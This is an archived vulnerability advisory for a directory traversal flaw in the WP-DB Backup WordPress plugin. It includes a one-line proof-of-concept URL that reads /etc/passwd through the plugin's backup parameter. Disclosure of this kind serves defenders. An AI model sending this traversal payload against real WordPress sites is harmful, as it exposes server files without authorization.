TUCoPS :: Web :: Blogs :: b06-4235.htm

Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability
Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability
Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability



Hi all,

Software: WP-DB Backup Plugin for Wordpress

Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ 

Description:
WP-DB Backup is vulnerable to directory traversal attack.
You must have administrator rights in the wordpress blog to exploit
this vulnerability.

PoC:
http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup=../../../../../etc/passwd 

Credits:
marc & shb from ssteam are credited with discoverying this vulnerability.

Vendor:
not contacted.

-- 
Coolest IT security blog: http://ssteam.ath.cx 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH